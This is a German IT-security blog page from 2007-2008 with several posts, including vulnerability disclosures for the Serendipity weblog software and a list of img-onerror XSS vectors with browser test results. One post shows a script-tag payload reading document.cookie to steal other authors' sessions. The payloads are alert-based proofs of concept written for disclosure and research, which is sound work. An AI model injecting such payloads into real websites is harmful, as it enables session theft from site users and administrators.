Neue Hakin9-Ausgabe: Nr. 35 / 05-2008

22 08 2008 22:13
Ich bin mal wieder in der neusten Ausgabe als Autor vertreten. Dieses Mal mit dem kurzen Tool-Artikel "Dnsmap", welcher schon in der vorletzten Ausgabe für die letzte Ausgabe angekündigt war. An mir liegt diese Verspätung allerdings nicht !
Der in der letzten Ausgabe versprochene Tool-Artikel zu "Verinice", einem ISMS-Tool, fehlt. Dies liegt aber auch nicht an mir. Vermutlich kommt dieser Artikel in der nächsten Ausgabe Anfang November.

Die neue Ausgabe beinhaltet noch folgende weitere Artikel:

  • Angriffserkennung über Benutzerverhalten
  • Schwachstellen in Webanwendungen
  • Apache Basisschutz
  • IPv6 Superworm aka Teredo
  • Sprachstörungen - Netzwerke unter Beschuss
  • E-Mail-Sicherheit
  • Advanced Encryption Standard AES
  • Weiterbildung mittels Security-Zertifizierungen
  • Evolution der IT-Sicherheit
  • EVB-IT
  • Wenn der Kunde zum König wird

Beim Durchblättern ist mir bereits aufgefallen, dass Yannick von Arx, der Autor des Artikels "Weiterbildung mittels Security-Zertifizierungen", überhaupt nicht auf Zertifizierungen zum Auditor nach ISO 27001 respektive BSI-Grundschutz eingeht.
Eigentlich schade darum, aber Zertifizierungen dieser Art sind eher weniger etwas für einen selbst. Vielleicht ist das der Grund, weshalb er diese in seinem Artikel vernachlässigt hat.


Twitter Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Neue Hakin9-Ausgabe: Nr. 35 / 05-2008 Mixx Neue Hakin9-Ausgabe: Nr. 35 / 05-2008 Bloglines Neue Hakin9-Ausgabe: Nr. 35 / 05-2008 Technorati Neue Hakin9-Ausgabe: Nr. 35 / 05-2008 Fark this: Neue Hakin9-Ausgabe: Nr. 35 / 05-2008 Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at YahooMyWeb Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at Furl.net Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at reddit.com Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at blinklist.com Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at Spurl.net Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at NewsVine Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at Simpy.com Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  at blogmarks Bookmark Neue Hakin9-Ausgabe: Nr. 35 / 05-2008  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

XSS-Schwachstelle in Serendpity-Plugin Freetag

07 02 2008 20:30
Ich habe vor ein paar Tagen eine Cross Site Scripting (XSS) Schwachstelle in einem sehr beliebten Plugin für die Weblog-Software "Serendipity" namens "Freetag" gefunden.

Das Advisory zur Schwachstelle gibt es hier.

Um es kurz zu machen: es gibt bereits ein Update, welches dringendst eingespielt werden sollte, sofern man das Freetag-Plugin integriert hat !
(Der aktuelle XSS-Vektor ist auf IE 6, IE 7 und Netscape Navigator 8.1 (im IE-Rendering Mode) ausgelegt.)
Ein Eintrag von Garvin Hicking befindet sich dazu hier.

Im Gegensatz zu meinen sonst rein deutschsprachigen Beiträgen hier im Blog, ist das Advisory selbstverständlich in englischer Sprache gehalten ! Es ist momentan aber noch nicht online, da es eigentlich erst für morgen geplant war.

Update: Advisory ist nun online. / Advisory is now online.
Mit einem entsprechenden Google Dork lassen sich leicht unzählige verwundbare Webseiten finden. Dieser Google Dork wird zur Sicherheit allerdings nicht veröffentlicht werden.

Update 2: CVE-Candidate: CVE-2008-0751.


Twitter Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at del.icio.us Facebook Google Bookmarks FriendFeed Digg XSS-Schwachstelle in Serendpity-Plugin Freetag Mixx XSS-Schwachstelle in Serendpity-Plugin Freetag Bloglines XSS-Schwachstelle in Serendpity-Plugin Freetag Technorati XSS-Schwachstelle in Serendpity-Plugin Freetag Fark this: XSS-Schwachstelle in Serendpity-Plugin Freetag Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at YahooMyWeb Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at Furl.net Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at reddit.com Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at blinklist.com Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at Spurl.net Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at NewsVine Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at Simpy.com Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  at blogmarks Bookmark XSS-Schwachstelle in Serendpity-Plugin Freetag  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Wie man es nicht machen sollte - revisited

16 01 2008 16:33
Nach mehr als einem Monat Zeit funktioniert dies hier noch immer. Dabei bräuchte es nicht einmal fünf Minuten, um es in Ordnung zu bringen.
Und ja, es wurde dem Mobilfunk-Provider gemeldet (mit Rückantwort).

Twitter Bookmark Wie man es nicht machen sollte - revisited  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Wie man es nicht machen sollte - revisited Mixx Wie man es nicht machen sollte - revisited Bloglines Wie man es nicht machen sollte - revisited Technorati Wie man es nicht machen sollte - revisited Fark this: Wie man es nicht machen sollte - revisited Bookmark Wie man es nicht machen sollte - revisited  at YahooMyWeb Bookmark Wie man es nicht machen sollte - revisited  at Furl.net Bookmark Wie man es nicht machen sollte - revisited  at reddit.com Bookmark Wie man es nicht machen sollte - revisited  at blinklist.com Bookmark Wie man es nicht machen sollte - revisited  at Spurl.net Bookmark Wie man es nicht machen sollte - revisited  at NewsVine Bookmark Wie man es nicht machen sollte - revisited  at Simpy.com Bookmark Wie man es nicht machen sollte - revisited  at blogmarks Bookmark Wie man es nicht machen sollte - revisited  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Neuer XSS-Angriffsvektor

05 01 2008 19:49
Nicht wirklich neu, aber er fehlt noch in RSnakes XSS Cheat Sheet:

<img src=. onerror=alert('XSS')>

Getestet in Firefox 2.0.0.11, Opera 9.25, Internet Explorer 7 und Safari 3.04 Beta (Windows).

Allerdings gibt es noch einige andere Varianten, die wie folgt funktionieren:

0<img src=\ onerror=alert(0)>FF2: 0 / IE7: 1 / O: 1 / S: 1
1<img src="/" onerror=alert(1)>FF2: 0 / IE7: 1 / O: 1 / S: 1
2<img src="." onerror=alert(2)>FF2: 1 / IE7: 1 / O: 1 / S: 1
3<img src="" onerror=alert(3)>FF2: 1 / IE7: 1 / O: 0 / S: 0
4<img src=. onerror=alert(4)>FF2: 1 / IE7: 1 / O: 1 / S: 1
5<img src=/ onerror=alert(5)>FF2: 0 / IE7: 1 / O: 1 / S: 1
6<img src= onerror=alert(6)>FF2: 0 / IE7: 0 / O: 0 / S: 0
7<img src onerror=alert(7)>FF2: 1 / IE7: 0 / O: 0 / S: 0
8<img onerror=alert(8)>FF2: 0 / IE7: 0 / O: 0 / S: 0
9<img src="\" onerror=alert(9)>FF2: 0 / IE7: 1 / O: 1 / S: 1
(0 = funktioniert nicht; 1 = funktioniert)


Twitter Bookmark Neuer XSS-Angriffsvektor  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Neuer XSS-Angriffsvektor Mixx Neuer XSS-Angriffsvektor Bloglines Neuer XSS-Angriffsvektor Technorati Neuer XSS-Angriffsvektor Fark this: Neuer XSS-Angriffsvektor Bookmark Neuer XSS-Angriffsvektor  at YahooMyWeb Bookmark Neuer XSS-Angriffsvektor  at Furl.net Bookmark Neuer XSS-Angriffsvektor  at reddit.com Bookmark Neuer XSS-Angriffsvektor  at blinklist.com Bookmark Neuer XSS-Angriffsvektor  at Spurl.net Bookmark Neuer XSS-Angriffsvektor  at NewsVine Bookmark Neuer XSS-Angriffsvektor  at Simpy.com Bookmark Neuer XSS-Angriffsvektor  at blogmarks Bookmark Neuer XSS-Angriffsvektor  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

XSS-Bug in Serendipity

02 01 2008 19:21
In Serendipity existiert eine Schwachstelle, die sich für XSS-Angriffe nutzen lässt.

Ganz so dramatisch, wie dies jetzt klingt, ist sie allerdings nicht und dürfte wahrscheinlich auch nur wenige Serendipity-User betreffen, da hier auf mehrere Autoren im System gesetzt wird von denen mindestens ein Autor böswillige Absichten hat.
Die Schwachstelle resultiert aus einer fehlenden Bereinigung der Titel-Zeile eines entsprechend präparierten Eintrags, wenn darauf mit einem (un)moderierten Kommentar geantwortet wurde.

Da in Serendipity generell HTML- und auch JavaScript-Code erlaubt ist, ist dies eigentlich keinen Blog-Eintrag wert, da dies by design erlaubt ist und somit als Feature und nicht als Bug verstanden werden soll.

Wer aber zusammen mit anderen Autoren in einem Blog Einträge verfasst (egal ob in diesem Blog zur Sicherheit das Event-Plugin "XSSTrust" eingesetzt wird oder nicht), kann auf diese Weise an gültige Cookies anderer Autoren oder gar des Administrators gelangen.

Ein böswilliger Autor erstellt einen neuen Eintrag mit bspw. dem folgenden Titel:

<script>alert(document.cookie)</script>

Wenn dieser Autor danach einen Kommentar zu seinem Eintrag verfasst und später ein anderer Autor oder gar ein Administrator auf die "Kommentare"-Seite in der Serendipity-Verwaltungsoberfläche geht, so wird dessen Cookie in einer Dialogbox des Webbrowsers angezeigt. (Natürlich ließe sich der Cookie auch an der Angreifer hinschicken o.ä. ...)


"XSS-Bug in Serendipity" vollständig lesen


Twitter Bookmark XSS-Bug in Serendipity  at del.icio.us Facebook Google Bookmarks FriendFeed Digg XSS-Bug in Serendipity Mixx XSS-Bug in Serendipity Bloglines XSS-Bug in Serendipity Technorati XSS-Bug in Serendipity Fark this: XSS-Bug in Serendipity Bookmark XSS-Bug in Serendipity  at YahooMyWeb Bookmark XSS-Bug in Serendipity  at Furl.net Bookmark XSS-Bug in Serendipity  at reddit.com Bookmark XSS-Bug in Serendipity  at blinklist.com Bookmark XSS-Bug in Serendipity  at Spurl.net Bookmark XSS-Bug in Serendipity  at NewsVine Bookmark XSS-Bug in Serendipity  at Simpy.com Bookmark XSS-Bug in Serendipity  at blogmarks Bookmark XSS-Bug in Serendipity  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Neues Buch: The Web Application Hacker's Handbook

27 12 2007 22:44
Seit heute bin ich stolzer Besitzer eines neuen Buches: "The Web Application Hacker's Handbook" (ISBN-13: 978-0470170779). Geschrieben von den beiden Autoren Dafydd Stuttard und Marcus Pinto. :-)

Ich bin gespannt auf das, was mir in den letzten Jahren u.U. entgangen sein sollte. Hoffentlich nicht viel.

Update: Komplett durchgelesen habe ich das Buch bisher zwar noch nicht, aber es fehlt definitiv die Erwähnung der Header "Range" und "Request-Range". Schließlich lässt sich mit letzterem einiges anstellen.


Twitter Bookmark Neues Buch: The Web Application Hacker's Handbook  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Neues Buch: The Web Application Hacker's Handbook Mixx Neues Buch: The Web Application Hacker's Handbook Bloglines Neues Buch: The Web Application Hacker's Handbook Technorati Neues Buch: The Web Application Hacker's Handbook Fark this: Neues Buch: The Web Application Hacker's Handbook Bookmark Neues Buch: The Web Application Hacker's Handbook  at YahooMyWeb Bookmark Neues Buch: The Web Application Hacker's Handbook  at Furl.net Bookmark Neues Buch: The Web Application Hacker's Handbook  at reddit.com Bookmark Neues Buch: The Web Application Hacker's Handbook  at blinklist.com Bookmark Neues Buch: The Web Application Hacker's Handbook  at Spurl.net Bookmark Neues Buch: The Web Application Hacker's Handbook  at NewsVine Bookmark Neues Buch: The Web Application Hacker's Handbook  at Simpy.com Bookmark Neues Buch: The Web Application Hacker's Handbook  at blogmarks Bookmark Neues Buch: The Web Application Hacker's Handbook  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Neue Winterreifen

26 12 2007 20:36
Ich brauche dringend neue Winterreifen, da die alten Reifen

  1. (fast) alle unterschiedlicher Marke sind;
  2. über sechs Jahre alt sind;
  3. teilweise einen Riss haben;
  4. ein Profil von nur noch ca. 2 mm haben, sofern ich dies das letztes Mal beim TÜV richtig gehört habe.

Geplant war das für diesen Winter sowieso. Und dank Weihnachten kann ich mir das auch endlich leisten. Das es jetzt auf Winterreifen auch noch Rabatt gibt, kommt mir zudem entgegen.

Bislang eigentlich noch kein Grund, um dies als Beitrag in die Kategorie "IT-Security" zu stellen oder überhaupt zu veröffentlichen. Dieser folgt aber sogleich:

Und zwar habe ich bei meiner Reifen-Recherche bei A.T.U ein (ganz triviales) XSS-Problem festgestellt. Da es auf der Webseite einen Online-Shop gibt, ist das natürlich schon interessanter. Mal sehen, ob ich noch mehr Rabatt auf meinen Reifeneinkauf bekomme, wenn ich vor Ort entsprechende Hinweise loswerde. ;-)


Twitter Bookmark Neue Winterreifen  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Neue Winterreifen Mixx Neue Winterreifen Bloglines Neue Winterreifen Technorati Neue Winterreifen Fark this: Neue Winterreifen Bookmark Neue Winterreifen  at YahooMyWeb Bookmark Neue Winterreifen  at Furl.net Bookmark Neue Winterreifen  at reddit.com Bookmark Neue Winterreifen  at blinklist.com Bookmark Neue Winterreifen  at Spurl.net Bookmark Neue Winterreifen  at NewsVine Bookmark Neue Winterreifen  at Simpy.com Bookmark Neue Winterreifen  at blogmarks Bookmark Neue Winterreifen  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca